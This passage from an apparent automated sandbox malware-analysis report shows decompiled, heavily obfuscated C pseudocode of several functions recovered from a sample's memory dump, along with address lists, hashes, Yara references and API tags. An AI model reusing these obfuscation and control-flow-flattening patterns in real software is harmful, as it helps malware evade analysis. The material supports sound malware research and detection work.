				_v1092 = _v1092 ^ 0x000a96bc;
				_v1084 = 0x9e65;
				_v1084 = _v1084 ^ 0xd37ef8f9;
				_t253 = 0x14;
				_v1084 = _v1084 / _t253;
				_v1084 = _v1084 ^ 0x0a9307fe;
				_v1100 = 0x36e3;
				_v1100 = _v1100 + 0xffff4219;
				_v1100 = _v1100 | 0x679c7357;
				_t254 = 0x3e;
				_v1100 = _v1100 * 0x7e;
				_v1100 = _v1100 ^ 0xffbf63c1;
				_v1108 = 0x25e;
				_v1108 = _v1108 / _t254;
				_v1108 = _v1108 | 0x82073b90;
				_v1108 = _v1108 * 0x30;
				_v1108 = _v1108 ^ 0x615b4461;
				do {
					while(_t216 != 0x295ca1) {
						if(_t216 == 0x1144238d) {
							_t216 = 0x274f9b22;
							continue;
						} else {
							if(_t216 == 0x1718f041) {
								E006CC0C6(_v1092, _v1084,  &_v1040, _v1100, _v1108); // executed
							} else {
								if(_t216 == 0x274f9b22) {
									E006D3E3F(_t216,  &_v520, __eflags, _v1088, _v1112);
									_t216 = 0x295ca1;
									continue;
								} else {
									_t264 = _t216 - 0x3691f983;
									if(_t216 != 0x3691f983) {
										goto L10;
									} else {
										_push( &_v1040);
										_push( &_v520);
										E006C7B63(_v1104, _v1120, _t264);
										_t248 =  !=  ? 1 : _t248;
										_t216 = 0x1718f041;
										continue;
									}
								}
							}
						}
						L13:
						return _t248;
					}
					_push(_v1068);
					_t204 = E006D889D(0x6dc9b0, _v1096, __eflags);
					_pop(_t218);
					_t242 =  *0x6dca2c; // 0x248300
					_t176 = _t242 + 0x230; // 0x710050
					E006CC680(_t176, _v1064, _v1080, _t218, _v1072,  *0x6dca2c, _t204,  &_v1040);
					E006D2025(_v1060, _t204, _v1116, _v1124);
					_t257 =  &(_t257[9]);
					_t216 = 0x3691f983;
					L10:
					__eflags = _t216 - 0x16e30c37;
				} while (__eflags != 0);
				goto L13;
			}






































                                          0x006cee78
                                          0x006cee7e
                                          0x006cee88
                                          0x006cee90
                                          0x006cee95
                                          0x006ceea1
                                          0x006ceea3
                                          0x006ceea7
                                          0x006ceeb6
                                          0x006ceeb9
                                          0x006ceec3
                                          0x006ceec4
                                          0x006ceeca
                                          0x006ceed2
                                          0x006ceeda
                                          0x006ceedf
                                          0x006ceee7
                                          0x006ceeef
                                          0x006ceef7
                                          0x006ceeff
                                          0x006cef07
                                          0x006cef0f
                                          0x006cef14
                                          0x006cef1c
                                          0x006cef24
                                          0x006cef33
                                          0x006cef37
                                          0x006cef3f
                                          0x006cef4c
                                          0x006cef56
                                          0x006cef57
                                          0x006cef5d
                                          0x006cef65
                                          0x006cef74
                                          0x006cef78
                                          0x006cef80
                                          0x006cef88
                                          0x006cef8d
                                          0x006cef95
                                          0x006cef9d
                                          0x006cefa5
                                          0x006cefaf
                                          0x006cefb3
                                          0x006cefbb
                                          0x006cefc3
                                          0x006cefcb
                                          0x006cefd3
                                          0x006cefdb
                                          0x006cefe3
                                          0x006cefeb
                                          0x006ceff3
                                          0x006ceffb
                                          0x006cf003
                                          0x006cf011
                                          0x006cf012
                                          0x006cf016
                                          0x006cf01e
                                          0x006cf028
                                          0x006cf038
                                          0x006cf03e
                                          0x006cf04b
                                          0x006cf055
                                          0x006cf05d
                                          0x006cf065
                                          0x006cf06a
                                          0x006cf072
                                          0x006cf07a
                                          0x006cf082
                                          0x006cf08a
                                          0x006cf092
                                          0x006cf09a
                                          0x006cf09f
                                          0x006cf0a7
                                          0x006cf0af
                                          0x006cf0bb
                                          0x006cf0c0
                                          0x006cf0c6
                                          0x006cf0ce
                                          0x006cf0d6
                                          0x006cf0de
                                          0x006cf0eb
                                          0x006cf0ec
                                          0x006cf0f0
                                          0x006cf0f8
                                          0x006cf106
                                          0x006cf10a
                                          0x006cf117
                                          0x006cf11b
                                          0x006cf123
                                          0x006cf123
                                          0x006cf12d
                                          0x006cf190
                                          0x00000000
                                          0x006cf12f
                                          0x006cf135
                                          0x006cf215
                                          0x006cf13b
                                          0x006cf13d
                                          0x006cf185
                                          0x006cf18c
                                          0x00000000
                                          0x006cf13f
                                          0x006cf13f
                                          0x006cf145
                                          0x00000000
                                          0x006cf14b
                                          0x006cf157
                                          0x006cf15f
                                          0x006cf160
                                          0x006cf16c
                                          0x006cf16f
                                          0x00000000
                                          0x006cf16f
                                          0x006cf145
                                          0x006cf13d
                                          0x006cf135
                                          0x006cf21d
                                          0x006cf229
                                          0x006cf229
                                          0x006cf194
                                          0x006cf1a1
                                          0x006cf1a6
                                          0x006cf1c2
                                          0x006cf1cc
                                          0x006cf1d2
                                          0x006cf1e5
                                          0x006cf1ea
                                          0x006cf1ed
                                          0x006cf1f2
                                          0x006cf1f2
                                          0x006cf1f2
                                          0x00000000

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.2095095758.00000000006C1000.00000020.00000001.sdmp, Offset: 006C0000, based on PE: true
                                          • Associated: 00000007.00000002.2095092922.00000000006C0000.00000004.00000001.sdmp Download File
                                          • Associated: 00000007.00000002.2095106870.00000000006DC000.00000004.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: I/5o$aD[a$6$L
                                          • API String ID: 0-1330720659
                                          • Opcode ID: c675e1889697b79d7275c3a799d82b9da0cdf6149f4cbe4273e2de7f7b231e66
                                          • Instruction ID: 410cd8913a18c41076ce12936e9ff13a1295b53abcd1485362e74e549bfe18f7
                                          • Opcode Fuzzy Hash: c675e1889697b79d7275c3a799d82b9da0cdf6149f4cbe4273e2de7f7b231e66
                                          • Instruction Fuzzy Hash: A29120715083819FD358CF65C48991BBBF6FBC5358F10892EF19696260D3BA8A09CF86
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 006C7B63, Relevance: 2.7, Strings: 2, Instructions: 187COMMONCrypto
                                          Download Yara Rule
                                          C-Code - Quality: 95%
                                          			E006C7B63(void* __ecx, void* __edx, void* __eflags) {
				void* _t227;
				signed int _t253;
				signed int _t257;
				signed int _t258;
				void* _t279;
				void* _t280;

				_t279 = _t280 - 0x70;
				_push( *((intOrPtr*)(_t279 + 0x7c)));
				_push( *((intOrPtr*)(_t279 + 0x78)));
				_push(__edx);
				_push(__ecx);
				E006C602B(_t227);
				 *(_t279 + 0x5c) = 0x4f49;
				 *(_t279 + 0x5c) =  *(_t279 + 0x5c) + 0xffff573d;
				 *(_t279 + 0x5c) =  *(_t279 + 0x5c) >> 0xe;
				 *(_t279 + 0x5c) =  *(_t279 + 0x5c) + 0xffff1f14;
				 *(_t279 + 0x5c) =  *(_t279 + 0x5c) ^ 0x00031f13;
				 *(_t279 + 0x20) = 0x2d3b;
				 *(_t279 + 0x20) =  *(_t279 + 0x20) << 0xa;
				 *(_t279 + 0x20) =  *(_t279 + 0x20) ^ 0x00b4ea14;
				 *(_t279 + 0x38) = 0xada;
				_t257 = 0x56;
				 *(_t279 + 0x38) =  *(_t279 + 0x38) * 0xd;
				 *(_t279 + 0x38) =  *(_t279 + 0x38) ^ 0x7978ee92;
				 *(_t279 + 0x38) =  *(_t279 + 0x38) ^ 0x79786b80;
				 *(_t279 + 0x44) = 0x9fd0;
				 *(_t279 + 0x44) =  *(_t279 + 0x44) << 0xd;
				 *(_t279 + 0x44) =  *(_t279 + 0x44) + 0xffff90c4;
				 *(_t279 + 0x44) =  *(_t279 + 0x44) ^ 0x13f99f58;
				 *(_t279 + 0x28) = 0xbdd8;
				 *(_t279 + 0x28) =  *(_t279 + 0x28) / _t257;
				 *(_t279 + 0x28) =  *(_t279 + 0x28) ^ 0x65272766;
				 *(_t279 + 0x28) =  *(_t279 + 0x28) ^ 0x65270fe8;
				 *(_t279 + 0x24) = 0xa469;
				 *(_t279 + 0x24) =  *(_t279 + 0x24) * 0x47;
				 *(_t279 + 0x24) =  *(_t279 + 0x24) ^ 0x002db229;
				 *(_t279 + 0x48) = 0xdd17;
				 *(_t279 + 0x48) =  *(_t279 + 0x48) << 4;
				 *(_t279 + 0x48) =  *(_t279 + 0x48) >> 9;
				 *(_t279 + 0x48) =  *(_t279 + 0x48) ^ 0x00005398;
				 *(_t279 + 0x3c) = 0x840;
				 *(_t279 + 0x3c) =  *(_t279 + 0x3c) ^ 0x7135c857;
				 *(_t279 + 0x3c) =  *(_t279 + 0x3c) + 0xffffaa29;
				 *(_t279 + 0x3c) =  *(_t279 + 0x3c) ^ 0x71355336;
				 *(_t279 + 0x34) = 0xe245;
				 *(_t279 + 0x34) =  *(_t279 + 0x34) ^ 0x5c1086b0;
				 *(_t279 + 0x34) =  *(_t279 + 0x34) << 0xc;
				 *(_t279 + 0x34) =  *(_t279 + 0x34) ^ 0x064f42a5;
				 *(_t279 + 0x68) = 0x7c59;
				 *(_t279 + 0x68) =  *(_t279 + 0x68) >> 7;
				 *(_t279 + 0x68) =  *(_t279 + 0x68) + 0xdfb1;
				 *(_t279 + 0x68) =  *(_t279 + 0x68) >> 1;
				 *(_t279 + 0x68) =  *(_t279 + 0x68) ^ 0x00006add;
				 *(_t279 + 0x1c) = 0x17b0;
				 *(_t279 + 0x1c) =  *(_t279 + 0x1c) * 0x33;
				 *(_t279 + 0x1c) =  *(_t279 + 0x1c) ^ 0x0004ea7a;
				 *(_t279 + 0xc) = 0x52de;
				 *(_t279 + 0xc) =  *(_t279 + 0xc) >> 3;
				 *(_t279 + 0xc) =  *(_t279 + 0xc) ^ 0x00000565;
				 *(_t279 + 0x14) = 0xa04a;
				 *(_t279 + 0x14) =  *(_t279 + 0x14) + 0x5b3d;
				 *(_t279 + 0x14) =  *(_t279 + 0x14) ^ 0x0000ad98;
				 *(_t279 + 0x10) = 0x88b9;
				 *(_t279 + 0x10) =  *(_t279 + 0x10) << 0xa;
				 *(_t279 + 0x10) =  *(_t279 + 0x10) ^ 0x0222fd12;
				 *(_t279 + 0x58) = 0x8451;
				 *(_t279 + 0x58) =  *(_t279 + 0x58) << 1;
				 *(_t279 + 0x58) =  *(_t279 + 0x58) + 0xffff44cb;
				 *(_t279 + 0x58) =  *(_t279 + 0x58) + 0xffff231f;
				 *(_t279 + 0x58) =  *(_t279 + 0x58) ^ 0xffff3ae7;
				 *(_t279 + 0x2c) = 0xa221;
				 *(_t279 + 0x2c) =  *(_t279 + 0x2c) << 0xe;
				 *(_t279 + 0x2c) =  *(_t279 + 0x2c) ^ 0x37ec24ae;
				 *(_t279 + 0x2c) =  *(_t279 + 0x2c) ^ 0x1f641a26;
				 *(_t279 + 0x6c) = 0xb834;
				 *(_t279 + 0x6c) =  *(_t279 + 0x6c) * 5;
				 *(_t279 + 0x6c) =  *(_t279 + 0x6c) + 0xff22;
				 *(_t279 + 0x6c) =  *(_t279 + 0x6c) + 0xffff2c65;
				 *(_t279 + 0x6c) =  *(_t279 + 0x6c) ^ 0x00038cf7;
				 *(_t279 + 0x60) = 0x6d71;
				 *(_t279 + 0x60) =  *(_t279 + 0x60) + 0xffff2e20;
				 *(_t279 + 0x60) =  *(_t279 + 0x60) << 0xa;
				 *(_t279 + 0x60) =  *(_t279 + 0x60) >> 7;
				 *(_t279 + 0x60) =  *(_t279 + 0x60) ^ 0x01fcf6fe;
				 *(_t279 + 0x40) = 0xcc9d;
				 *(_t279 + 0x40) =  *(_t279 + 0x40) << 1;
				 *(_t279 + 0x40) =  *(_t279 + 0x40) | 0xa720d145;
				 *(_t279 + 0x40) =  *(_t279 + 0x40) ^ 0xa721d74b;
				 *(_t279 + 0x50) = 0xea3;
				 *(_t279 + 0x50) =  *(_t279 + 0x50) + 0x27fa;
				 *(_t279 + 0x50) =  *(_t279 + 0x50) >> 7;
				 *(_t279 + 0x50) =  *(_t279 + 0x50) ^ 0x00000071;
				 *(_t279 + 0x64) = 0xe156;
				 *(_t279 + 0x64) =  *(_t279 + 0x64) + 0x8b10;
				_t258 = 0x77;
				 *(_t279 + 0x64) =  *(_t279 + 0x64) / _t258;
				 *(_t279 + 0x64) =  *(_t279 + 0x64) << 7;
				 *(_t279 + 0x64) =  *(_t279 + 0x64) ^ 0x0001fc91;
				 *(_t279 + 0x54) = 0xb949;
				 *(_t279 + 0x54) =  *(_t279 + 0x54) ^ 0xe8c9a038;
				 *(_t279 + 0x54) =  *(_t279 + 0x54) * 0x53;
				 *(_t279 + 0x54) =  *(_t279 + 0x54) * 0x46;
				 *(_t279 + 0x54) =  *(_t279 + 0x54) ^ 0x24032f8e;
				 *(_t279 + 0x4c) = 0x8c7e;
				 *(_t279 + 0x4c) =  *(_t279 + 0x4c) * 0x17;
				_t171 = _t279 - 0x14; // 0x68cf93e9
				 *(_t279 + 0x4c) =  *(_t279 + 0x4c) << 5;
				 *(_t279 + 0x4c) =  *(_t279 + 0x4c) ^ 0x0193ba3f;
				 *(_t279 + 0x30) = 0x8a4e;
				 *(_t279 + 0x30) =  *(_t279 + 0x30) << 0xc;
				 *(_t279 + 0x30) =  *(_t279 + 0x30) | 0xb22e72a5;
				 *(_t279 + 0x30) =  *(_t279 + 0x30) ^ 0xbaaee90f;
				 *(_t279 + 0x18) = 0x537b;
				 *(_t279 + 0x18) =  *(_t279 + 0x18) >> 0x10;
				 *(_t279 + 0x18) =  *(_t279 + 0x18) ^ 0x00002127;
				E006D93A8( *(_t279 + 0x44),  *(_t279 + 0x28),  *(_t279 + 0x24), _t171, 0x1e,  *(_t279 + 0x48));
				_t193 = _t279 - 0x21c; // 0x68cf91e1
				E006D93A8( *(_t279 + 0x3c),  *(_t279 + 0x34),  *(_t279 + 0x68), _t193, 0x208,  *(_t279 + 0x1c));
				_t198 = _t279 - 0x424; // 0x68cf8fd9
				E006D93A8( *(_t279 + 0xc),  *(_t279 + 0x14),  *(_t279 + 0x10), _t198, 0x208,  *(_t279 + 0x58));
				_t202 = _t279 - 0x21c; // 0x68cf91e1
				E006C6636(_t202,  *(_t279 + 0x2c),  *(_t279 + 0x6c),  *(_t279 + 0x60),  *((intOrPtr*)(_t279 + 0x78)));
				_t208 = _t279 - 0x424; // 0x68cf8fd9
				E006C6636(_t208,  *(_t279 + 0x40),  *(_t279 + 0x50),  *(_t279 + 0x64),  *((intOrPtr*)(_t279 + 0x7c)));
				 *(_t279 - 0x10) =  *(_t279 + 0x5c);
				_t214 = _t279 - 0x14; // 0x68cf93e9
				_t215 = _t279 - 0x21c; // 0x68cf91e1
				 *((intOrPtr*)(_t279 - 0xc)) = _t215;
				_t217 = _t279 - 0x424; // 0x68cf8fd9
				 *((intOrPtr*)(_t279 - 8)) = _t217;
				 *((short*)(_t279 - 4)) =  *(_t279 + 0x38) |  *(_t279 + 0x20);
				_t253 = E006D7BF4(_t214,  *(_t279 + 0x54),  *(_t279 + 0x4c),  *(_t279 + 0x30),  *(_t279 + 0x18)); // executed
				asm("sbb eax, eax");
				return  ~_t253 + 1;
			}









                                          0x006c7b64
                                          0x006c7b6f
                                          0x006c7b72
                                          0x006c7b75
                                          0x006c7b76
                                          0x006c7b77
                                          0x006c7b7c
                                          0x006c7b85
                                          0x006c7b8c
                                          0x006c7b90
                                          0x006c7b97
                                          0x006c7b9e
                                          0x006c7ba5
                                          0x006c7ba9
                                          0x006c7bb0
                                          0x006c7bbd
                                          0x006c7bbe
                                          0x006c7bc1
                                          0x006c7bc8
                                          0x006c7bcf
                                          0x006c7bd6
                                          0x006c7bda
                                          0x006c7be1
                                          0x006c7be8
                                          0x006c7bf4
                                          0x006c7bf7
                                          0x006c7bfe
                                          0x006c7c05
                                          0x006c7c10
                                          0x006c7c13
                                          0x006c7c1a
                                          0x006c7c21
                                          0x006c7c25
                                          0x006c7c29
                                          0x006c7c30
                                          0x006c7c37
                                          0x006c7c3e
                                          0x006c7c45
                                          0x006c7c4c
                                          0x006c7c53
                                          0x006c7c5a
                                          0x006c7c5e
                                          0x006c7c65
                                          0x006c7c6c
                                          0x006c7c70
                                          0x006c7c77
                                          0x006c7c7a
                                          0x006c7c81
                                          0x006c7c8c
                                          0x006c7c8f
                                          0x006c7c96
                                          0x006c7c9d
                                          0x006c7ca1
                                          0x006c7ca8
                                          0x006c7caf
                                          0x006c7cb6
                                          0x006c7cbd
                                          0x006c7cc4
                                          0x006c7cc8
                                          0x006c7ccf
                                          0x006c7cd6
                                          0x006c7cd9
                                          0x006c7ce0
                                          0x006c7ce7
                                          0x006c7cee
                                          0x006c7cf5
                                          0x006c7cf9
                                          0x006c7d00
                                          0x006c7d07
                                          0x006c7d12
                                          0x006c7d15
                                          0x006c7d1c
                                          0x006c7d23
                                          0x006c7d2a
                                          0x006c7d33
                                          0x006c7d3a
                                          0x006c7d3e
                                          0x006c7d42
                                          0x006c7d49
                                          0x006c7d50
                                          0x006c7d53
                                          0x006c7d5a
                                          0x006c7d61
                                          0x006c7d68
                                          0x006c7d6f
                                          0x006c7d73
                                          0x006c7d77
                                          0x006c7d7e
                                          0x006c7d8a
                                          0x006c7d8d
                                          0x006c7d90
                                          0x006c7d94
                                          0x006c7d9b
                                          0x006c7da2
                                          0x006c7dad
                                          0x006c7db4
                                          0x006c7db7
                                          0x006c7dbe
                                          0x006c7dc9
                                          0x006c7dcc
                                          0x006c7dcf
                                          0x006c7dd3
                                          0x006c7dda
                                          0x006c7de1
                                          0x006c7de5
                                          0x006c7dec
                                          0x006c7df3
                                          0x006c7dfa
                                          0x006c7dfe
                                          0x006c7e14
                                          0x006c7e21
                                          0x006c7e32
                                          0x006c7e3a
                                          0x006c7e4b
                                          0x006c7e53
                                          0x006c7e65
                                          0x006c7e6d
                                          0x006c7e7c
                                          0x006c7e84
                                          0x006c7e87
                                          0x006c7e8a
                                          0x006c7e90
                                          0x006c7e93
                                          0x006c7e99
                                          0x006c7ea5
                                          0x006c7eb2
                                          0x006c7ebc
                                          0x006c7ec4

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.2095095758.00000000006C1000.00000020.00000001.sdmp, Offset: 006C0000, based on PE: true
                                          • Associated: 00000007.00000002.2095092922.00000000006C0000.00000004.00000001.sdmp Download File
                                          • Associated: 00000007.00000002.2095106870.00000000006DC000.00000004.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: FileOperation
                                          • String ID: 6S5q$f''e
                                          • API String ID: 3080627654-2864536462
                                          • Opcode ID: 36b9ea7229c61bbd42b1c058f75f695ac5583f6220406a17043b82f58b666b25
                                          • Instruction ID: 82e0aaf1cf94f24ce9ead82849d71c6c31b9d4531c534c4c1b2f12fc3b0ac386
                                          • Opcode Fuzzy Hash: 36b9ea7229c61bbd42b1c058f75f695ac5583f6220406a17043b82f58b666b25
                                          • Instruction Fuzzy Hash: DAA1CDB140138D9BEF59CF61C9898CE3BB1BF04358F508119FD2A962A0D3BAD959CF81
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 006CB41F, Relevance: 2.6, Strings: 2, Instructions: 76COMMONCrypto
                                          Download Yara Rule
                                          C-Code - Quality: 97%
                                          			E006CB41F(signed int __edx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr _v48;
				intOrPtr _t91;
				signed int* _t93;
				intOrPtr _t95;
				signed int _t103;
				signed int _t104;

				_v44 = _v44 & 0x00000000;
				_v48 = 0x783c80;
				_v8 = 0x978d;
				_v8 = _v8 >> 8;
				_v8 = _v8 >> 5;
				_v8 = _v8 | 0x918d7e28;
				_v8 = _v8 ^ 0x918d7bef;
				_v28 = 0x8ae6;
				_v28 = _v28 + 0xffff2048;
				_v28 = _v28 ^ 0xfffff0f4;
				_v40 = 0x90b0;
				_v40 = _v40 + 0x186c;
				_v40 = _v40 ^ 0x0000e60c;
				_v12 = 0x4bc7;
				_t103 = __edx;
				_v12 = _v12 * 0x77;
				_v12 = _v12 >> 8;
				_v12 = _v12 << 3;
				_v12 = _v12 ^ 0x000165a0;
				_v36 = 0x87ea;
				_v36 = _v36 | 0x75974cd4;
				_v36 = _v36 ^ 0x75979443;
				_v32 = 0x7f4c;
				_v32 = _v32 ^ 0x8971dc13;
				_v32 = _v32 ^ 0x89718547;
				_v24 = 0xd36b;
				_t104 = 0x3c;
				_v24 = _v24 * 9;
				_v24 = _v24 << 1;
				_v24 = _v24 >> 5;
				_v24 = _v24 ^ 0x000045e9;
				_v20 = 0xf34d;
				_v20 = _v20 + 0x5309;
				_v20 = _v20 << 0xa;
				_v20 = _v20 | 0x23e3e3ea;
				_v20 = _v20 ^ 0x27fbee67;
				_v16 = 0xef72;
				_v16 = _v16 * 0x55;
				_v16 = _v16 << 0x10;
				_v16 = _v16 / _t104;
				_v16 = _v16 ^ 0x0225d37d;
				_push(_v28);
				_t91 = E006C1000(_v40, _v12, _v36, _v32, E006D889D(_t93, _v8, _v16));
				_t95 =  *0x6dca28; // 0x233138
				 *((intOrPtr*)(_t95 + 0x1c + _t103 * 4)) = _t91;
				return E006D2025(_v24, _t90, _v20, _v16);
			}



















                                          0x006cb425
                                          0x006cb429
                                          0x006cb430
                                          0x006cb437
                                          0x006cb43b
                                          0x006cb43f
                                          0x006cb446
                                          0x006cb44d
                                          0x006cb454
                                          0x006cb45b
                                          0x006cb462
                                          0x006cb469
                                          0x006cb470
                                          0x006cb477
                                          0x006cb484
                                          0x006cb48a
                                          0x006cb48d
                                          0x006cb491
                                          0x006cb495
                                          0x006cb49c
                                          0x006cb4a3
                                          0x006cb4aa
                                          0x006cb4b1
                                          0x006cb4b8
                                          0x006cb4bf
                                          0x006cb4c6
                                          0x006cb4d1
                                          0x006cb4d2
                                          0x006cb4d5
                                          0x006cb4d8
                                          0x006cb4dc
                                          0x006cb4e3
                                          0x006cb4ea
                                          0x006cb4f1
                                          0x006cb4f5
                                          0x006cb4fc
                                          0x006cb503
                                          0x006cb50e
                                          0x006cb511
                                          0x006cb51a
                                          0x006cb51d
                                          0x006cb524
                                          0x006cb53e
                                          0x006cb543
                                          0x006cb551
                                          0x006cb565

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.2095095758.00000000006C1000.00000020.00000001.sdmp, Offset: 006C0000, based on PE: true
                                          • Associated: 00000007.00000002.2095092922.00000000006C0000.00000004.00000001.sdmp Download File
                                          • Associated: 00000007.00000002.2095106870.00000000006DC000.00000004.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: LibraryLoad
                                          • String ID: 81#$#
                                          • API String ID: 1029625771-2479327819
                                          • Opcode ID: c303e2fe2ec90e50e393ef42cead17641110c0b737193de08bcbf8f5169719c4
                                          • Instruction ID: 63575d75ffc2314fc1d60a4b7b2a2d448a7bc20dd79127decb5445e60851fc2f
                                          • Opcode Fuzzy Hash: c303e2fe2ec90e50e393ef42cead17641110c0b737193de08bcbf8f5169719c4
                                          • Instruction Fuzzy Hash: 1941EE72C0121AEBDF04CFA6C94A4EEFBB1FB54318F208599C411B62A0D7B90B48CF95
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 006C568E, Relevance: 1.4, Strings: 1, Instructions: 184COMMONCrypto
                                          Download Yara Rule
                                          C-Code - Quality: 84%
                                          			E006C568E(void* __ecx, void* __edx) {
				void* _t188;
				void* _t209;
				void* _t210;
				signed int _t215;
				signed int _t216;
				signed int _t217;
				signed int _t218;
				signed int _t219;
				intOrPtr _t242;
				void* _t245;
				void* _t248;
				void* _t249;

				_t248 = _t249 - 0x5c;
				_t242 =  *((intOrPtr*)(_t248 + 0x6c));
				_t245 = __edx;
				_push(0);
				_push( *((intOrPtr*)(_t248 + 0x78)));
				_push( *((intOrPtr*)(_t248 + 0x74)));
				_push( *((intOrPtr*)(_t248 + 0x70)));
				_push(_t242);
				_push( *((intOrPtr*)(_t248 + 0x68)));
				_push( *((intOrPtr*)(_t248 + 0x64)));
				_push(__edx);
				_push(__ecx);
				E006C602B(_t188);
				 *(_t248 + 0x38) = 0xda0c;
				 *(_t248 + 0x38) =  *(_t248 + 0x38) << 7;
				_t215 = 0x75;
				 *(_t248 + 0x38) =  *(_t248 + 0x38) * 0x59;
				 *(_t248 + 0x38) =  *(_t248 + 0x38) ^ 0x25e734ff;
				 *(_t248 + 0x54) = 0xb39d;
				 *(_t248 + 0x54) =  *(_t248 + 0x54) << 6;
				 *(_t248 + 0x54) =  *(_t248 + 0x54) | 0xca3cae0f;
				 *(_t248 + 0x54) =  *(_t248 + 0x54) * 0xe;
				 *(_t248 + 0x54) =  *(_t248 + 0x54) ^ 0x0f551016;
				 *(_t248 + 0x1c) = 0x5da7;
				 *(_t248 + 0x1c) =  *(_t248 + 0x1c) ^ 0x52b401ed;
				 *(_t248 + 0x1c) =  *(_t248 + 0x1c) / _t215;
				 *(_t248 + 0x1c) =  *(_t248 + 0x1c) ^ 0x00b496a1;
				 *(_t248 + 0x30) = 0xba31;
				_t216 = 0x2c;
				 *(_t248 + 0x30) =  *(_t248 + 0x30) / _t216;
				 *(_t248 + 0x30) =  *(_t248 + 0x30) | 0x346b3718;
				 *(_t248 + 0x30) =  *(_t248 + 0x30) ^ 0x346b13e9;
				 *(_t248 + 0x2c) = 0x6402;
				_t217 = 0x3f;
				 *(_t248 + 0x2c) =  *(_t248 + 0x2c) * 0x14;
				 *(_t248 + 0x2c) =  *(_t248 + 0x2c) >> 2;
				 *(_t248 + 0x2c) =  *(_t248 + 0x2c) ^ 0x0001cbcb;
				 *(_t248 + 0x34) = 0x3e45;
				 *(_t248 + 0x34) =  *(_t248 + 0x34) << 0xb;
				 *(_t248 + 0x34) =  *(_t248 + 0x34) >> 2;
				 *(_t248 + 0x34) =  *(_t248 + 0x34) ^ 0x007ce60c;
				 *(_t248 + 0x3c) = 0xfd38;
				 *(_t248 + 0x3c) =  *(_t248 + 0x3c) + 0xffffe888;
				 *(_t248 + 0x3c) =  *(_t248 + 0x3c) * 0x69;
				 *(_t248 + 0x3c) =  *(_t248 + 0x3c) ^ 0x005e4f03;
				 *(_t248 + 0x40) = 0xcc4c;
				 *(_t248 + 0x40) =  *(_t248 + 0x40) ^ 0x07f5c2dc;
				 *(_t248 + 0x40) =  *(_t248 + 0x40) / _t217;
				 *(_t248 + 0x40) =  *(_t248 + 0x40) ^ 0x00207040;
				 *(_t248 + 0x28) = 0x6724;
				 *(_t248 + 0x28) =  *(_t248 + 0x28) + 0xffffafc3;
				 *(_t248 + 0x28) =  *(_t248 + 0x28) << 1;
				 *(_t248 + 0x28) =  *(_t248 + 0x28) ^ 0x000008e0;
				 *(_t248 + 0x24) = 0x9d87;
				 *(_t248 + 0x24) =  *(_t248 + 0x24) >> 6;
				 *(_t248 + 0x24) =  *(_t248 + 0x24) * 0x24;
				 *(_t248 + 0x24) =  *(_t248 + 0x24) ^ 0x00004341;
				 *(_t248 + 0x58) = 0xb89d;
				 *(_t248 + 0x58) =  *(_t248 + 0x58) >> 0xb;
				 *(_t248 + 0x58) =  *(_t248 + 0x58) + 0x8f1;
				 *(_t248 + 0x58) =  *(_t248 + 0x58) << 8;
				 *(_t248 + 0x58) =  *(_t248 + 0x58) ^ 0x00091f00;
				 *(_t248 + 0x44) = 0x534f;
				 *(_t248 + 0x44) =  *(_t248 + 0x44) + 0x522f;
				 *(_t248 + 0x44) =  *(_t248 + 0x44) ^ 0x4c12b7e9;
				 *(_t248 + 0x44) =  *(_t248 + 0x44) ^ 0x4c125009;
				 *(_t248 + 0x20) = 0x7c36;
				 *(_t248 + 0x20) =  *(_t248 + 0x20) ^ 0x32feb437;
				_t218 = 0x73;
				 *(_t248 + 0x20) =  *(_t248 + 0x20) / _t218;
				 *(_t248 + 0x20) =  *(_t248 + 0x20) ^ 0x0071b2de;
				 *(_t248 + 0x4c) = 0x6d80;
				 *(_t248 + 0x4c) =  *(_t248 + 0x4c) + 0xd21e;
				 *(_t248 + 0x4c) =  *(_t248 + 0x4c) + 0xffff4640;
				 *(_t248 + 0x4c) =  *(_t248 + 0x4c) ^ 0x36936ae7;
				 *(_t248 + 0x4c) =  *(_t248 + 0x4c) ^ 0x3693cc91;
				 *(_t248 + 0x50) = 0x11c0;
				 *(_t248 + 0x50) =  *(_t248 + 0x50) | 0x65d8412a;
				_t219 = 0x49;
				 *(_t248 + 0x50) =  *(_t248 + 0x50) / _t219;
				 *(_t248 + 0x50) =  *(_t248 + 0x50) | 0x06211354;
				 *(_t248 + 0x50) =  *(_t248 + 0x50) ^ 0x076544c6;
				 *(_t248 + 0x18) = 0x8ddc;
				 *(_t248 + 0x18) =  *(_t248 + 0x18) | 0x3e354716;
				 *(_t248 + 0x18) =  *(_t248 + 0x18) ^ 0x3e35d915;
				 *(_t248 + 0x14) = 0xfbdb;
				 *(_t248 + 0x14) =  *(_t248 + 0x14) * 0x44;
				 *(_t248 + 0x14) =  *(_t248 + 0x14) ^ 0x0042d7a4;
				 *(_t248 + 0x48) = 0xd404;
				 *(_t248 + 0x48) =  *(_t248 + 0x48) >> 1;
				 *(_t248 + 0x48) =  *(_t248 + 0x48) + 0x728c;
				 *(_t248 + 0x48) =  *(_t248 + 0x48) + 0xfe7d;
				 *(_t248 + 0x48) =  *(_t248 + 0x48) ^ 0x0001b0de;
				_t220 =  *(_t248 + 0x38);
				E006D93A8( *(_t248 + 0x38),  *(_t248 + 0x54),  *(_t248 + 0x1c), _t248 - 0x40, 0x44,  *(_t248 + 0x30));
				 *((intOrPtr*)(_t248 - 0x40)) = 0x44;
